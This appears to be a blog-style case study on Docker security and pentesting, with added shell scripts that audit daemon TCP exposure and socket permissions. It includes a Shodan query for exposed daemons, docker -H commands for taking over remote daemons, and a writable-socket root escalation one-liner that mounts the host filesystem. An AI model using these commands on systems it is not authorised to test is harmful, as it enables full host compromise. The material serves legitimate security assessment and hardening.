intro

Docker is a popular technology adopted by many organizations in their cloud services. This case study summarizes Docker security and pentest strategies.

Docker arch

Docker adopts a client-server architecture with the following main components:

  • Docker Daemon: manages Docker objects such as networks, volumes, images and containers.
  • Docker API: the interface through which the CLI (or any other client) talks to the daemon, over a Unix socket or a TCP socket.
  • Docker CLI: the command-line client used to pull, build and run images and containers.

By default, the CLI communicates with the daemon locally via a Unix socket (/var/run/docker.sock). The daemon may also be bound to TCP ports 2375, 2376 or 2377 for remote connections; this is dangerous, because anyone who can reach that port controls the daemon and therefore the host. Many vulnerable setups like this can be found on Shodan: port:2375 product:"docker"

exploiting Docker Daemon directly

To expose the Docker daemon via TCP, modify /lib/systemd/system/docker.service:

# add the following to ExecStart
-H=tcp://0.0.0.0:2375

# then save and restart the Daemon

One can then connect to the daemon with:

> docker -H <remote host ip>:<port> <docker-command>

# to get the version
> docker -H <target>:2375 version

# get a list of available images
> docker -H <target>:2375 images

# see running (and stopped) containers
> docker -H <target>:2375 ps -a

# connect to a container by id
> docker -H <target>:2375 exec -it <container-id> /bin/sh
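Exposing the daemon API over TCP is the misconfiguration that makes the commands above work, so the first thing a defender wants is a way to spot it on a host before anyone else does. The following POSIX shell script is an added example, not code from the original post: it reads the ExecStart line of a systemd unit file and the "hosts" array of a daemon.json (both paths are parameters so it can be pointed at copies or fixtures), lists every listener, and fails when the API is bound to tcp:// without --tlsverify. The function names are my own.

```shell
#!/bin/sh
# Added example, not part of the original post: audit how dockerd is told to
# listen and flag the plain-TCP exposure described above. The unit file and
# daemon.json paths are parameters (the tests use constructed fixtures), so the
# check can run against copies of /lib/systemd/system/docker.service and
# /etc/docker/daemon.json without touching the live daemon.

# Print every -H / --host value found on the ExecStart line of a systemd unit.
# Handles both "-H tcp://..." and "-H=tcp://..." spellings.
dockerd_hosts_from_unit() {
    [ -r "$1" ] || return 0
    grep -E '^ExecStart=' "$1" | awk '{
        for (i = 1; i <= NF; i++) {
            if ($i == "-H" || $i == "--host") { print $(i + 1) }
            else if ($i ~ /^(-H|--host)=/) { sub(/^[^=]*=/, "", $i); print $i }
        }
    }'
}

# Print every entry of the "hosts" array in a daemon.json. Dependency-free
# (no jq), so it only handles the flat array form the daemon documents.
dockerd_hosts_from_json() {
    [ -r "$1" ] || return 0
    tr -d '\n' < "$1" \
        | grep -o '"hosts"[[:space:]]*:[[:space:]]*\[[^]]*\]' \
        | grep -o '"[a-z]*://[^"]*"' \
        | tr -d '"'
}

# Return 0 when TLS client verification is switched on in either config source
# (--tlsverify on the command line, or "tlsverify": true in daemon.json).
dockerd_tls_enforced() {
    { grep -E '^ExecStart=' "$1" 2>/dev/null; cat "$2" 2>/dev/null; } \
        | grep -Eq -e '--tlsverify(=true)?([[:space:]]|$)|"tlsverify"[[:space:]]*:[[:space:]]*true'
}

# Report each listener; return 1 if the API is reachable over TCP without TLS.
audit_dockerd_exposure() {
    unit="$1"; json="$2"; status=0
    hosts=$( { dockerd_hosts_from_unit "$unit"; dockerd_hosts_from_json "$json"; } )
    # No -H anywhere means dockerd falls back to its default local Unix socket.
    [ -n "$hosts" ] || hosts="unix:///var/run/docker.sock"
    for h in $hosts; do
        case "$h" in
            tcp://*)
                if dockerd_tls_enforced "$unit" "$json"; then
                    echo "WARN: $h listens on TCP; client certificates are verified"
                else
                    echo "CRIT: $h exposes the daemon API over plain TCP; anyone who can reach it is root on the host"
                    status=1
                fi ;;
            *)  echo "OK:   $h" ;;
        esac
    done
    return $status
}

# Usage on a host:
#   audit_dockerd_exposure /lib/systemd/system/docker.service /etc/docker/daemon.json
```

A non-zero exit from audit_dockerd_exposure is what you would wire into a compliance job; a tcp:// listener with --tlsverify still shows up as a warning because the remaining exposure then depends entirely on how the client certificates are handled.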

automated tools for docker security assessment

The following scripts/tools automate the assessment of Docker security.

Both provide static analysis of Docker images and report the vulnerabilities found in them.

Additionally, CIS publishes a benchmark for Docker. The audit can be run against your own Docker setup via the Docker image they provide:

> docker run -it --net host --pid host --userns host --cap-add audit_control \
 -e DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST \
 -v /etc:/etc:ro \
 -v /usr/bin/containerd:/usr/bin/containerd:ro \
 -v /usr/bin/runc:/usr/bin/runc:ro \
 -v /usr/lib/systemd:/usr/lib/systemd:ro \
 -v /var/lib:/var/lib:ro \
 -v /var/run/docker.sock:/var/run/docker.sock:ro \
 --label docker_bench_security \
 docker/docker-bench-security

using docker for pentest

Many pentest tools are built as Docker containers, such as nmap, sqlmap, wpscan, impacket, metasploit etc. Out of all, I personally think the most convenient build is Empire, which had been out of maintenance for a while and was more difficult to set up. But this is available as a Docker image.

> docker pull instrumentisto/nmap
> docker pull hypnza/dirbuster
> docker pull googlesky/sqlmap
> docker pull bcsecurity/empire
> docker pull rflathers/impacket
> docker pull metasploitframework/metasploit-framework

commonly exploited docker misconfig

Writable socket: https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket

# check which images are available
> docker images
# privilege escalation via the image: mount the host root and chroot into it
> docker -H unix:///var/run/docker.sock run -v /:/host -it {image_name} chroot /host /bin/bash

curl can also talk to the Docker daemon directly over the Unix socket:

# https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
> curl --unix-socket /var/run/docker.sock http://localhost/images/json
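Both techniques in this section, the docker run -v /:/host escalation and the raw curl call, need nothing more than write access to the socket, so the defensive question is simply: who can write to /var/run/docker.sock, and who is in the group that owns it? The script below is an added example, not from the original post or from HackTricks: it reports the socket's permission bits and owning group and lists the members of the docker group from an /etc/group-style file (both paths are parameters so it can run against fixtures). The function names are my own.

```shell
#!/bin/sh
# Added example, not part of the original post: audit who can reach the Docker
# daemon through its Unix socket. Anyone who can write to the socket, or who is
# in the group that owns it, can drive the daemon API exactly as the curl and
# "run -v /:/host" commands above do, and is therefore root-equivalent on the
# host. Paths are parameters so the checks can be run against test fixtures.

# Print the permission bits of a path as three octal digits (e.g. 660).
# GNU stat first, BSD stat as a fallback; fail if neither works.
path_mode() {
    m=$(stat -c '%a' "$1" 2>/dev/null) || m=$(stat -f '%Lp' "$1" 2>/dev/null) || return 1
    # Drop a leading setuid/setgid/sticky digit if present, keep the final three.
    printf '%s\n' "${m#${m%???}}"
}

# Name of the group owning a path.
path_group() {
    stat -c '%G' "$1" 2>/dev/null || stat -f '%Sg' "$1" 2>/dev/null
}

# Return 0 when the group or other write bit is set in a three-digit mode.
mode_writable_beyond_owner() {
    g=${1#?}; g=${g%?}     # middle digit: group
    o=${1#??}              # last digit: other
    for d in "$g" "$o"; do
        case "$d" in 2|3|6|7) return 0 ;; esac
    done
    return 1
}

# List the members of the docker group from an /etc/group-style file.
docker_group_members() {
    awk -F: '$1 == "docker" { print $4 }' "$1"
}

# Report the socket's exposure; return 1 if it is world-writable.
audit_docker_socket() {
    sock="$1"; groupfile="${2:-/etc/group}"; status=0
    mode=$(path_mode "$sock") || { echo "SKIP: $sock not found"; return 0; }
    grp=$(path_group "$sock")
    if mode_writable_beyond_owner "$mode"; then
        case "$mode" in
            ??[2367]) echo "CRIT: $sock mode $mode is world-writable; every local user is root-equivalent"; status=1 ;;
            *)        echo "WARN: $sock mode $mode is writable by group '$grp'; its members are root-equivalent" ;;
        esac
    else
        echo "OK:   $sock mode $mode is writable by its owner only"
    fi
    members=$(docker_group_members "$groupfile")
    [ -z "$members" ] || echo "INFO: members of group 'docker': $members"
    return $status
}

# Usage on a host:
#   audit_docker_socket /var/run/docker.sock /etc/group
```

The default Docker install leaves the socket at 660 root:docker, so the WARN line is the normal case; what matters then is that the docker group list printed by the INFO line contains only accounts you would also be happy to give sudo.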